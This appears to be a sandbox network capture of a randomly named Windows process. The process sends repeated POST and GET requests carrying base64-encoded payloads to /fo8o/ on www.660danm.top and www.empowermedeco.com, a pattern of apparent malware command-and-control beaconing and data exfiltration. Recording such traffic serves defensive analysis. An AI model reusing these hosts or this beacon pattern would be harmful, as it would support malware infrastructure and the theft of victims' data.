Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49771	34.111.148.214	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:17:00.384543896 CEST	764	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.660danm.top Origin: http://www.660danm.top Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 199 Referer: http://www.660danm.top/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 67 42 37 52 2f 72 78 67 4c 6a 73 51 6b 38 49 71 59 6a 43 7a 72 6b 6e 71 78 6c 42 78 35 70 5a 6a 48 37 48 51 6f 33 33 56 6e 4e 4a 72 64 76 4c 2b 69 6b 6b 4f 71 77 75 78 48 64 32 43 33 33 31 45 37 55 6c 43 70 79 65 5a 55 37 2f 37 62 31 55 47 42 61 6e 55 50 36 50 66 52 70 71 53 54 70 39 69 47 4a 68 2f 4a 45 41 4f 6f 74 78 50 51 53 71 30 43 62 44 6e 33 4c 32 45 2b 63 6f 35 56 39 67 76 6f 71 6b 79 49 6e 54 43 69 35 73 55 55 30 64 55 73 32 39 38 48 55 79 30 33 4e 46 66 35 44 6f 4e 56 33 50 73 4a 50 79 32 4a 77 49 6d 73 52 35 49 31 77 74 39 6b 46 71 47 66 33 51 55 48 44 50 2b 2f 67 3d 3d Data Ascii: aZ=gB7R/rxgLjsQk8IqYjCzrknqxlBx5pZjH7HQo33VnNJrdvL+ikkOqwuxHd2C331E7UlCpyeZU7/7b1UGBanUP6PfRpqSTp9iGJh/JEAOotxPQSq0CbDn3L2E+co5V9gvoqkyInTCi5sUU0dUs298HUy03NFf5DoNV3PsJPy2JwImsR5I1wt9kFqGf3QUHDP+/g==
Jun 8, 2024 18:17:01.144393921 CEST	728	IN	HTTP/1.1 405 Not Allowed Server: nginx/1.20.2 Date: Sat, 08 Jun 2024 16:17:00 GMT Content-Type: text/html Content-Length: 559 Via: 1.1 google Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49772	34.111.148.214	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:17:02.924360037 CEST	784	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.660danm.top Origin: http://www.660danm.top Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 219 Referer: http://www.660danm.top/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 67 42 37 52 2f 72 78 67 4c 6a 73 51 6e 63 59 71 61 45 57 7a 71 45 6e 72 37 46 42 78 77 4a 5a 6e 48 37 4c 51 6f 7a 50 46 6e 2f 74 72 64 50 62 2b 6a 6e 38 4f 70 77 75 78 49 39 32 62 6f 48 31 4e 37 55 70 4b 70 79 79 5a 55 37 62 37 62 77 77 47 42 70 2f 54 4a 36 50 64 64 4a 71 51 63 4a 39 69 47 4a 68 2f 4a 45 45 30 6f 74 35 50 51 69 36 30 44 34 62 67 72 62 32 44 33 38 6f 35 66 64 67 72 6f 71 6b 55 49 6d 2f 34 69 36 45 55 55 32 46 55 73 45 46 37 4e 55 79 2b 36 74 45 31 39 54 5a 35 4d 6c 4b 42 57 4d 57 43 49 41 63 39 6b 33 6f 53 6b 42 4d 71 32 46 4f 31 43 77 5a 67 4b 41 79 33 6b 6d 74 62 6c 43 69 4d 35 6a 37 35 65 68 52 2b 59 43 76 30 31 75 45 3d Data Ascii: aZ=gB7R/rxgLjsQncYqaEWzqEnr7FBxwJZnH7LQozPFn/trdPb+jn8OpwuxI92boH1N7UpKpyyZU7b7bwwGBp/TJ6PddJqQcJ9iGJh/JEE0ot5PQi60D4bgrb2D38o5fdgroqkUIm/4i6EUU2FUsEF7NUy+6tE19TZ5MlKBWMWCIAc9k3oSkBMq2FO1CwZgKAy3kmtblCiM5j75ehR+YCv01uE=
Jun 8, 2024 18:17:03.681165934 CEST	728	IN	HTTP/1.1 405 Not Allowed Server: nginx/1.20.2 Date: Sat, 08 Jun 2024 16:17:03 GMT Content-Type: text/html Content-Length: 559 Via: 1.1 google Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49773	34.111.148.214	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:17:05.456619024 CEST	10866	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.660danm.top Origin: http://www.660danm.top Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10299 Referer: http://www.660danm.top/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 67 42 37 52 2f 72 78 67 4c 6a 73 51 6e 63 59 71 61 45 57 7a 71 45 6e 72 37 46 42 78 77 4a 5a 6e 48 37 4c 51 6f 7a 50 46 6e 2f 6c 72 64 38 44 2b 6a 47 38 4f 6f 77 75 78 46 64 32 47 6f 48 30 4e 37 56 42 4f 70 79 4f 6a 55 35 54 37 61 57 38 47 48 63 54 54 63 4b 50 64 56 70 71 64 54 70 39 33 47 4e 46 37 4a 45 30 30 6f 74 35 50 51 6b 57 30 45 72 44 67 70 62 32 45 2b 63 6f 31 56 39 67 54 6f 71 39 68 49 6d 36 61 69 4b 6b 55 55 57 56 55 2f 48 39 37 42 55 79 77 39 74 45 74 39 54 56 6d 4d 6c 57 6a 57 4e 7a 58 49 43 41 39 68 51 56 51 68 42 4d 57 69 6b 57 32 59 58 6f 4c 55 79 6d 46 67 57 78 55 69 6a 71 47 37 79 58 37 5a 69 4e 78 4d 69 6a 49 71 72 4f 47 5a 38 44 63 57 73 76 64 47 62 65 50 7a 52 70 4c 4e 78 48 31 4b 6b 58 78 71 66 65 55 36 72 34 44 76 48 36 74 44 43 6a 44 4b 69 50 76 7a 70 62 68 5a 66 46 54 51 43 63 71 76 47 6b 57 53 78 46 35 68 48 30 4f 54 4b 52 58 37 4b 72 30 36 57 70 56 72 34 59 30 51 48 6d 58 57 2b 4c 57 32 71 46 52 42 4a 63 72 39 59 55 68 36 58 2b 58 74 71 6a 69 62 32 37 73 71 70 6f [TRUNCATED] Data Ascii: aZ=gB7R/rxgLjsQncYqaEWzqEnr7FBxwJZnH7LQozPFn/lrd8D+jG8OowuxFd2GoH0N7VBOpyOjU5T7aW8GHcTTcKPdVpqdTp93GNF7JE00ot5PQkW0ErDgpb2E+co1V9gToq9hIm6aiKkUUWVU/H97BUyw9tEt9TVmMlWjWNzXICA9hQVQhBMWikW2YXoLUymFgWxUijqG7yX7ZiNxMijIqrOGZ8DcWsvdGbePzRpLNxH1KkXxqfeU6r4DvH6tDCjDKiPvzpbhZfFTQCcqvGkWSxF5hH0OTKRX7Kr06WpVr4Y0QHmXW+LW2qFRBJcr9YUh6X+Xtqjib27sqpoqcTxDqedn6gnxNjZDZeoIAtNX5itH0Bx1ub070lsjSOPbLtlN/phjrxkjFBS/Nhj4oC1afaJAHYVAumPOPdKXFH7+k8TMWjqNMMGrrJFQUYbvLfvDyzzgzSn8iUubNuuLc9dmyA2HtzlvbEnPIsvMo+C+NgHX2iUUblNt64FMzH91vYQCClj8mSQtRXHJIiyX68K7ZeuAr2sFzhWIXU6/fSSUOw3+j7R/vPTdPZ/UtPwOevIjyvuWiqQnQs7JpnMEGQOlnokeSfr8WLjF+OQoV7uEz7MZOurRUPEzBFiRpYwv1mtvihFe1PS1BTYIAYtoNrqXN415Z6v0HL9q6xBX9B72oH1LLowm8B3d8C+6T+MVboDyKGYVAAa9beRg6LS1QvXyQBX12vj1+YXIq11FfyqQf7HiicyhAEAdcvTfQn2EieKK9ByHxeC507+0nHScVIEDgHBB/TqeskLz6R3DuMBbf2VlSVVpRER0fr6aZ2U9VYOCx1h57/RMelBGSNrTVWVfGQpZ7HUiQAAr16yrlcjyYHNUVsUS1vhvdDETv6UugjXIjEuj64dFZnadM4sHSsOzCBectYFCzfE71zZiDXuCrjJByDguQR0g2tq9mjOx1lCMTQ1uABAtCF6+rgXWOvY/JZ7u02JW8LiUxRMEXjp3rQV7vb4VC [TRUNCATED]
Jun 8, 2024 18:17:06.214567900 CEST	176	IN	HTTP/1.1 405 Method Not Allowed Server: nginx/1.20.2 Date: Sat, 08 Jun 2024 16:17:06 GMT Content-Type: text/html Content-Length: 559 Via: 1.1 google Connection: close
Jun 8, 2024 18:17:06.217516899 CEST	559	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to d

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49774	34.111.148.214	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:17:07.985296011 CEST	495	OUT	GET /fo8o/?qD=FrMTb&aZ=tDTx8bBUOSgexthKGxTOnUCc0VRR9qJVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrOeLTXcC8Q+8Ca4ZDKyYIpPg4REm9D5WLqa0= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.660danm.top Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jun 8, 2024 18:17:08.746558905 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Sat, 08 Jun 2024 16:17:08 GMT Content-Type: text/html Content-Length: 5161 Last-Modified: Mon, 15 Jan 2024 02:08:28 GMT Vary: Accept-Encoding ETag: "65a4939c-1429" Cache-Control: no-cache Accept-Ranges: bytes Via: 1.1 google Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 77 70 6b 52 65 70 6f 72 74 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 67 6c 6f 62 61 6c 65 72 72 6f 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 [TRUNCATED] Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js" crossorigin="true"></script><script>window.wpkReporter&&(window.wpk=new window.wpkReporter({bid:"berg-download",rel:"2.42.1",sampleRate:1,plugins:[[window.wpkglobalerrorPlugin,{jsErr:!0,jsErrSampleRate:1,resErr:!0,resErrSampleRate:1}],[window.wpkperformancePlugin,{enable:!0,sampleRate:.5}]]}),window.wpk.install())</script><script>function loadBaiduHmt(t){console.log("",t);var e=document.createElement("script");e.src="https://hm.baidu.com/hm.js?"+t;var o=document.getElementsByTagName("s
Jun 8, 2024 18:17:08.746596098 CEST	1236	IN	Data Raw: 63 72 69 70 74 22 29 5b 30 5d 3b 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 62 61 69 64 75 50 75 73 68 28 74 2c 65 2c 6f 29 7b 77 69 6e 64 6f 77 2e 5f 68 6d 74 2e 70 75 Data Ascii: cript")[0];o.parentNode.insertBefore(e,o)}function baiduPush(t,e,o){window._hmt.push(["_trackEvent",t,e,o])}console.log("..."),window._hmt=window._hmt\|\|[];const BUILD_ENV="quark",token="42296466acbd6a1e84224ab1433a06cc"
Jun 8, 2024 18:17:08.746607065 CEST	1236	IN	Data Raw: 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2c 69 73 55 43 3a 65 28 29 2c 69 73 51 75 61 72 6b 3a 72 28 29 2c 69 73 5f 64 75 61 6e 6e 65 69 3a 65 28 29 7c 7c 72 28 29 7d 2c 6e 29 2c 74 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 69 20 69 6e 20 Data Ascii: avigator.userAgent,isUC:e(),isQuark:r(),is_duannei:e()\|\|r()},n),t=[];for(var i in a)a.hasOwnProperty(i)&&t.push("".concat(encodeURIComponent(i),"=").concat(encodeURIComponent(a[i])));var c=t.join("&").replace(/%20/g,"+"),s="".concat("https://t
Jun 8, 2024 18:17:08.746617079 CEST	400	IN	Data Raw: 72 28 76 61 72 20 71 73 4c 69 73 74 3d 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 7c 7c 22 3f 22 29 2e 73 75 62 73 74 72 69 6e 67 28 31 29 2e 73 70 6c 69 74 28 22 26 22 29 2c 6c 65 6e 3d 71 73 4c 69 73 74 2e 6c 65 6e 67 Data Ascii: r(var qsList=(window.location.search\|\|"?").substring(1).split("&"),len=qsList.length,i=0;i<len;i++){var e=qsList[i];if("debug=true"===e){var $head=document.getElementsByTagName("head")[0],$script1=document.createElement("script");$script1.setA
Jun 8, 2024 18:17:08.755497932 CEST	1236	IN	Data Raw: 68 65 61 64 2e 6c 61 73 74 43 68 69 6c 64 29 2c 24 73 63 72 69 70 74 31 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b Data Ascii: head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/js/vconsle.js"),$head.insertBefore(e,$head.lastChild)};bre
Jun 8, 2024 18:17:08.755518913 CEST	117	IN	Data Raw: 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 61 67 65 2e 75 63 2e 63 6e 2f 73 2f 75 61 65 2f 67 2f 33 6f 2f 62 65 72 67 2f 73 74 61 74 69 63 2f 61 72 63 68 65 72 5f 69 6e 64 65 78 2e 65 39 36 64 63 36 64 63 36 38 36 33 38 Data Ascii: <script src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js"></script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49775	217.196.55.202	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:17:14.026648045 CEST	782	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 199 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 75 76 4e 72 6a 75 6d 30 30 49 4c 61 47 32 41 39 45 68 75 48 58 68 74 4e 38 33 6a 33 52 2b 57 52 6b 41 3d 3d Data Ascii: aZ=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0JuvNrjum00ILaG2A9EhuHXhtN83j3R+WRkA==
Jun 8, 2024 18:17:14.654145002 CEST	1070	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Sat, 08 Jun 2024 16:17:14 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49776	217.196.55.202	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:17:16.564416885 CEST	802	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 219 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 4a 2b 68 77 71 44 63 39 72 59 2f 4a 32 6a 6d 44 58 34 6d 45 37 4c 4e 4e 4a 54 4a 57 65 6b 6a 6b 6f 3d Data Ascii: aZ=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhJ+hwqDc9rY/J2jmDX4mE7LNNJTJWekjko=
